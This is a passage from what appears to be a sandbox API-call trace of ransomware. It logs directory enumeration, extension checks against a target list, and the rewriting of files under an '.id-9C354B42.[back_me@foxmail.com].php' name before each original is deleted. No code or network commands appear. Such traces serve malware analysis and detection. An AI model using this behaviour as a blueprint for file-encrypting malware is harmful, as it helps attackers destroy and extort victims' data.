shared\\filters\\offfiltx.dll.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0055.084] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\offfiltx.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0055.084] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.084] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.084] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\offfiltx.dll.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0055.085] GetLastError () returned 0x0 [0055.085] ReadFile (in: hFile=0x1b4, lpBuffer=0x44e0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3d5fed4, lpOverlapped=0x0 | out: lpBuffer=0x44e0020*, lpNumberOfBytesRead=0x3d5fed4*=0xffff0, lpOverlapped=0x0) returned 1 [0055.450] WriteFile (in: hFile=0x164, lpBuffer=0x44e0020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0x3d5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x44e0020*, lpNumberOfBytesWritten=0x3d5fc9c*=0xffff0, lpOverlapped=0x0) returned 1 [0055.476] ReadFile (in: hFile=0x1b4, lpBuffer=0x44e0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3d5fed4, lpOverlapped=0x0 | out: lpBuffer=0x44e0020*, lpNumberOfBytesRead=0x3d5fed4*=0x6afa0, lpOverlapped=0x0) returned 1 [0055.490] WriteFile (in: hFile=0x164, lpBuffer=0x44e0020*, nNumberOfBytesToWrite=0x6afb0, lpNumberOfBytesWritten=0x3d5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x44e0020*, lpNumberOfBytesWritten=0x3d5fc9c*=0x6afb0, lpOverlapped=0x0) returned 1 [0056.013] ReadFile (in: hFile=0x1b4, lpBuffer=0x44e0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3d5fed4, lpOverlapped=0x0 | out: lpBuffer=0x44e0020*, lpNumberOfBytesRead=0x3d5fed4*=0x0, lpOverlapped=0x0) returned 1 [0056.013] WriteFile (in: hFile=0x164, lpBuffer=0x44e0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x3d5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x44e0020*, lpNumberOfBytesWritten=0x3d5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0056.013] SetEndOfFile (hFile=0x164) returned 1 [0056.014] CloseHandle (hObject=0x164) returned 1 [0056.014] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.014] SetEndOfFile (hFile=0x1b4) returned 1 [0056.019] CloseHandle (hObject=0x1b4) returned 1 [0056.019] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0056.019] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\offfiltx.dll")) returned 1 [0056.020] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll") returned 67 [0056.020] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll") returned 67 [0056.020] lstrlenW (lpString=".doc") returned 4 [0056.020] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0056.020] lstrlenW (lpString=".docx") returned 5 [0056.020] lstrcmpiW (lpString1=".docx", lpString2="x.dll") returned -1 [0056.020] lstrlenW (lpString=".pdf") returned 4 [0056.020] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0056.020] lstrlenW (lpString=".xls") returned 4 [0056.020] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0056.020] lstrlenW (lpString=".xlsx") returned 5 [0056.020] lstrcmpiW (lpString1=".xlsx", lpString2="x.dll") returned -1 [0056.020] lstrlenW (lpString=".ppt") returned 4 [0056.020] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0056.020] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll") returned 67 [0056.020] lstrlenW (lpString=".zip") returned 4 [0056.020] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0056.020] lstrlenW (lpString=".rar") returned 4 [0056.020] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0056.020] lstrlenW (lpString=".bz2") returned 4 [0056.020] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0056.020] lstrlenW (lpString=".7z") returned 3 [0056.020] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0056.020] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll") returned 67 [0056.021] lstrlenW (lpString=".dbf") returned 4 [0056.021] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0056.021] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll") returned 67 [0056.021] lstrlenW (lpString=".1cd") returned 4 [0056.021] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0056.021] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll") returned 67 [0056.021] lstrlenW (lpString=".jpg") returned 4 [0056.021] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0056.021] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll") returned 67 [0056.021] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll") returned 67 [0056.021] lstrlenW (lpString=".doc") returned 4 [0056.021] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0056.021] lstrlenW (lpString=".docx") returned 5 [0056.021] lstrcmpiW (lpString1=".docx", lpString2="x.dll") returned -1 [0056.021] lstrlenW (lpString=".pdf") returned 4 [0056.021] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0056.021] lstrlenW (lpString=".xls") returned 4 [0056.022] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0056.022] lstrlenW (lpString=".xlsx") returned 5 [0056.022] lstrcmpiW (lpString1=".xlsx", lpString2="x.dll") returned -1 [0056.022] lstrlenW (lpString=".ppt") returned 4 [0056.022] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0056.022] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll") returned 67 [0056.022] lstrlenW (lpString=".zip") returned 4 [0056.022] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0056.022] lstrlenW (lpString=".rar") returned 4 [0056.022] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0056.022] lstrlenW (lpString=".bz2") returned 4 [0056.022] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0056.022] lstrlenW (lpString=".7z") returned 3 [0056.022] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0056.022] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll") returned 67 [0056.022] lstrlenW (lpString=".dbf") returned 4 [0056.022] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0056.022] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll") returned 67 [0056.022] lstrlenW (lpString=".1cd") returned 4 [0056.022] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0056.022] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll") returned 67 [0056.022] lstrlenW (lpString=".jpg") returned 4 [0056.022] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0056.023] lstrcmpiW (lpString1=".FNT", lpString2=".php") returned -1 [0056.023] lstrlenW (lpString="CGMIMP32.FNT") returned 12 [0056.023] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.fnt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e4 [0057.069] GetFileSizeEx (in: hFile=0x1e4, lpFileSize=0x3d5ff1c | out: lpFileSize=0x3d5ff1c*=606062) returned 1 [0057.069] CloseHandle (hObject=0x1e4) returned 1 [0057.069] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.fnt")) returned 0x20 [0057.069] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.fnt.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0057.069] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.fnt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e4 [0057.070] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.070] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.070] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.fnt.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0057.070] GetLastError () returned 0x0 [0057.070] ReadFile (in: hFile=0x1e4, lpBuffer=0x44e0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3d5fed4, lpOverlapped=0x0 | out: lpBuffer=0x44e0020*, lpNumberOfBytesRead=0x3d5fed4*=0x93f6e, lpOverlapped=0x0) returned 1 [0057.085] WriteFile (in: hFile=0x198, lpBuffer=0x44e0020*, nNumberOfBytesToWrite=0x93f70, lpNumberOfBytesWritten=0x3d5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x44e0020*, lpNumberOfBytesWritten=0x3d5fc9c*=0x93f70, lpOverlapped=0x0) returned 1 [0057.097] ReadFile (in: hFile=0x1e4, lpBuffer=0x44e0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3d5fed4, lpOverlapped=0x0 | out: lpBuffer=0x44e0020*, lpNumberOfBytesRead=0x3d5fed4*=0x0, lpOverlapped=0x0) returned 1 [0057.097] WriteFile (in: hFile=0x198, lpBuffer=0x44e0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x3d5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x44e0020*, lpNumberOfBytesWritten=0x3d5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0057.097] SetEndOfFile (hFile=0x198) returned 1 [0057.097] CloseHandle (hObject=0x198) returned 1 [0057.097] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.097] SetEndOfFile (hFile=0x1e4) returned 1 [0057.103] CloseHandle (hObject=0x1e4) returned 1 [0057.103] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0057.103] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.fnt")) returned 1 [0057.103] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT") returned 67 [0057.103] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT") returned 67 [0057.103] lstrlenW (lpString=".doc") returned 4 [0057.103] lstrcmpiW (lpString1=".doc", lpString2=".FNT") returned -1 [0057.103] lstrlenW (lpString=".docx") returned 5 [0057.103] lstrcmpiW (lpString1=".docx", lpString2="2.FNT") returned -1 [0057.103] lstrlenW (lpString=".pdf") returned 4 [0057.104] lstrcmpiW (lpString1=".pdf", lpString2=".FNT") returned 1 [0057.104] lstrlenW (lpString=".xls") returned 4 [0057.104] lstrcmpiW (lpString1=".xls", lpString2=".FNT") returned 1 [0057.104] lstrlenW (lpString=".xlsx") returned 5 [0057.104] lstrcmpiW (lpString1=".xlsx", lpString2="2.FNT") returned -1 [0057.104] lstrlenW (lpString=".ppt") returned 4 [0057.104] lstrcmpiW (lpString1=".ppt", lpString2=".FNT") returned 1 [0057.104] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT") returned 67 [0057.104] lstrlenW (lpString=".zip") returned 4 [0057.104] lstrcmpiW (lpString1=".zip", lpString2=".FNT") returned 1 [0057.104] lstrlenW (lpString=".rar") returned 4 [0057.104] lstrcmpiW (lpString1=".rar", lpString2=".FNT") returned 1 [0057.104] lstrlenW (lpString=".bz2") returned 4 [0057.104] lstrcmpiW (lpString1=".bz2", lpString2=".FNT") returned -1 [0057.104] lstrlenW (lpString=".7z") returned 3 [0057.104] lstrcmpiW (lpString1=".7z", lpString2="FNT") returned -1 [0057.104] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT") returned 67 [0057.104] lstrlenW (lpString=".dbf") returned 4 [0057.104] lstrcmpiW (lpString1=".dbf", lpString2=".FNT") returned -1 [0057.104] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT") returned 67 [0057.104] lstrlenW (lpString=".1cd") returned 4 [0057.104] lstrcmpiW (lpString1=".1cd", lpString2=".FNT") returned -1 [0057.104] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT") returned 67 [0057.104] lstrlenW (lpString=".jpg") returned 4 [0057.104] lstrcmpiW (lpString1=".jpg", lpString2=".FNT") returned 1 [0057.104] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT") returned 67 [0057.104] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT") returned 67 [0057.104] lstrlenW (lpString=".doc") returned 4 [0057.104] lstrcmpiW (lpString1=".doc", lpString2=".FNT") returned -1 [0057.104] lstrlenW (lpString=".docx") returned 5 [0057.104] lstrcmpiW (lpString1=".docx", lpString2="2.FNT") returned -1 [0057.105] lstrlenW (lpString=".pdf") returned 4 [0057.105] lstrcmpiW (lpString1=".pdf", lpString2=".FNT") returned 1 [0057.105] lstrlenW (lpString=".xls") returned 4 [0057.105] lstrcmpiW (lpString1=".xls", lpString2=".FNT") returned 1 [0057.105] lstrlenW (lpString=".xlsx") returned 5 [0057.105] lstrcmpiW (lpString1=".xlsx", lpString2="2.FNT") returned -1 [0057.105] lstrlenW (lpString=".ppt") returned 4 [0057.105] lstrcmpiW (lpString1=".ppt", lpString2=".FNT") returned 1 [0057.105] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT") returned 67 [0057.105] lstrlenW (lpString=".zip") returned 4 [0057.105] lstrcmpiW (lpString1=".zip", lpString2=".FNT") returned 1 [0057.105] lstrlenW (lpString=".rar") returned 4 [0057.105] lstrcmpiW (lpString1=".rar", lpString2=".FNT") returned 1 [0057.105] lstrlenW (lpString=".bz2") returned 4 [0057.105] lstrcmpiW (lpString1=".bz2", lpString2=".FNT") returned -1 [0057.105] lstrlenW (lpString=".7z") returned 3 [0057.105] lstrcmpiW (lpString1=".7z", lpString2="FNT") returned -1 [0057.105] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT") returned 67 [0057.105] lstrlenW (lpString=".dbf") returned 4 [0057.105] lstrcmpiW (lpString1=".dbf", lpString2=".FNT") returned -1 [0057.105] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT") returned 67 [0057.105] lstrlenW (lpString=".1cd") returned 4 [0057.105] lstrcmpiW (lpString1=".1cd", lpString2=".FNT") returned -1 [0057.105] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT") returned 67 [0057.105] lstrlenW (lpString=".jpg") returned 4 [0057.105] lstrcmpiW (lpString1=".jpg", lpString2=".FNT") returned 1 [0057.105] lstrcmpiW (lpString1=".FLT", lpString2=".php") returned -1 [0057.105] lstrlenW (lpString="PICTIM32.FLT") returned 12 [0057.106] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\pictim32.flt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e4 [0057.106] GetFileSizeEx (in: hFile=0x1e4, lpFileSize=0x3d5ff1c | out: lpFileSize=0x3d5ff1c*=73080) returned 1 [0057.106] CloseHandle (hObject=0x1e4) returned 1 [0057.106] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\pictim32.flt")) returned 0x20 [0057.106] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\pictim32.flt.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0057.106] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\pictim32.flt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e4 [0057.106] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.106] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.106] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\pictim32.flt.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) Thread: id = 20 os_tid = 0x9c8 [0034.900] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xfffe) returned 0x4200060 [0034.901] lstrlenW (lpString="C:") returned 2 [0034.901] FindFirstFileW (in: lpFileName="C:\\*", lpFindFileData=0x3fafd00 | out: lpFindFileData=0x3fafd00*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1002f, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0xbf87c8 [0034.901] lstrlenW (lpString="C:\\$Recycle.Bin") returned 15 [0034.901] lstrcmpiW (lpString1="C:\\Windows", lpString2="C:\\$Recycle.Bin") returned 1 [0034.901] lstrlenW (lpString="$Recycle.Bin") returned 12 [0034.901] lstrcmpiW (lpString1="C:\\Windows", lpString2="$Recycle.Bin") returned 1 [0034.901] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xfffe) returned 0x4210068 [0034.901] lstrlenW (lpString="C:\\$Recycle.Bin") returned 15 [0034.901] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\*", lpFindFileData=0x3fafa84 | out: lpFindFileData=0x3fafa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xbf8808 [0034.901] FindNextFileW (in: hFindFile=0xbf8808, lpFindFileData=0x3fafa84 | out: lpFindFileData=0x3fafa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0034.901] FindNextFileW (in: hFindFile=0xbf8808, lpFindFileData=0x3fafa84 | out: lpFindFileData=0x3fafa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x3ebb1770, ftLastAccessTime.dwHighDateTime=0x1d5351d, ftLastWriteTime.dwLowDateTime=0x3ebb1770, ftLastWriteTime.dwHighDateTime=0x1d5351d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-21-3388679973-3930757225-3770151564-1000", cAlternateFileName="S-1-5-~1")) returned 1 [0034.902] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000") returned 62 [0034.902] lstrcmpiW (lpString1="C:\\Windows", lpString2="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000") returned 1 [0034.902] lstrlenW (lpString="S-1-5-21-3388679973-3930757225-3770151564-1000") returned 46 [0034.902] lstrcmpiW (lpString1="C:\\Windows", lpString2="S-1-5-21-3388679973-3930757225-3770151564-1000") returned -1 [0034.902] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xfffe) returned 0x4221078 [0034.902] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000") returned 62 [0034.902] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*", lpFindFileData=0x3faf808 | out: lpFindFileData=0x3faf808*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x3ebb1770, ftLastAccessTime.dwHighDateTime=0x1d5351d, ftLastWriteTime.dwLowDateTime=0x3ebd78d0, ftLastWriteTime.dwHighDateTime=0x1d5351d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xbf8848 [0034.902] FindNextFileW (in: hFindFile=0xbf8848, lpFindFileData=0x3faf808 | out: lpFindFileData=0x3faf808*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x3ebb1770, ftLastAccessTime.dwHighDateTime=0x1d5351d, ftLastWriteTime.dwLowDateTime=0x3ebd78d0, ftLastWriteTime.dwHighDateTime=0x1d5351d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0034.902] FindNextFileW (in: hFindFile=0xbf8848, lpFindFileData=0x3faf808 | out: lpFindFileData=0x3faf808*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3ebb1770, ftCreationTime.dwHighDateTime=0x1d5351d, ftLastAccessTime.dwLowDateTime=0x3ebb1770, ftLastAccessTime.dwHighDateTime=0x1d5351d, ftLastWriteTime.dwLowDateTime=0x3ebd78d0, ftLastWriteTime.dwHighDateTime=0x1d5351d, nFileSizeHigh=0x0, nFileSizeLow=0x17a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini.id-9C354B42.[back_me@foxmail.com].php", cAlternateFileName="DESKTO~1.PHP")) returned 1 [0034.902] lstrlenW (lpString="desktop.ini.id-9C354B42.[back_me@foxmail.com].php") returned 49 [0034.902] lstrlenW (lpString=".1cd") returned 4 [0034.902] lstrcmpiW (lpString1=".1cd", lpString2=".php") returned -1 [0034.902] lstrlenW (lpString=".3ds") returned 4 [0034.903] lstrcmpiW (lpString1=".3ds", lpString2=".php") returned -1 [0034.903] lstrlenW (lpString=".3fr") returned 4 [0034.903] lstrcmpiW (lpString1=".3fr", lpString2=".php") returned -1 [0034.903] lstrlenW (lpString=".3g2") returned 4 [0034.903] lstrcmpiW (lpString1=".3g2", lpString2=".php") returned -1 [0034.903] lstrlenW (lpString=".3gp") returned 4 [0034.903] lstrcmpiW (lpString1=".3gp", lpString2=".php") returned -1 [0034.903] lstrlenW (lpString=".7z") returned 3 [0034.903] lstrcmpiW (lpString1=".7z", lpString2="php") returned -1 [0034.903] lstrlenW (lpString=".accda") returned 6 [0034.903] lstrcmpiW (lpString1=".accda", lpString2="m].php") returned -1 [0034.903] lstrlenW (lpString=".accdb") returned 6 [0034.903] lstrcmpiW (lpString1=".accdb", lpString2="m].php") returned -1 [0034.903] lstrlenW (lpString=".accdc") returned 6 [0034.903] lstrcmpiW (lpString1=".accdc", lpString2="m].php") returned -1 [0034.903] lstrlenW (lpString=".accde") returned 6 [0034.903] lstrcmpiW (lpString1=".accde", lpString2="m].php") returned -1 [0034.903] lstrlenW (lpString=".accdt") returned 6 [0034.903] lstrcmpiW (lpString1=".accdt", lpString2="m].php") returned -1 [0034.903] lstrlenW (lpString=".accdw") returned 6 [0034.903] lstrcmpiW (lpString1=".accdw", lpString2="m].php") returned -1 [0034.903] lstrlenW (lpString=".adb") returned 4 [0034.903] lstrcmpiW (lpString1=".adb", lpString2=".php") returned -1 [0034.903] lstrlenW (lpString=".adp") returned 4 [0034.903] lstrcmpiW (lpString1=".adp", lpString2=".php") returned -1 [0034.903] lstrlenW (lpString=".ai") returned 3 [0034.903] lstrcmpiW (lpString1=".ai", lpString2="php") returned -1 [0034.903] lstrlenW (lpString=".ai3") returned 4 [0034.903] lstrcmpiW (lpString1=".ai3", lpString2=".php") returned -1 [0034.903] lstrlenW (lpString=".ai4") returned 4 [0034.903] lstrcmpiW (lpString1=".ai4", lpString2=".php") returned -1 [0034.903] lstrlenW (lpString=".ai5") returned 4 [0034.903] lstrcmpiW (lpString1=".ai5", lpString2=".php") returned -1 [0034.903] lstrlenW (lpString=".ai6") returned 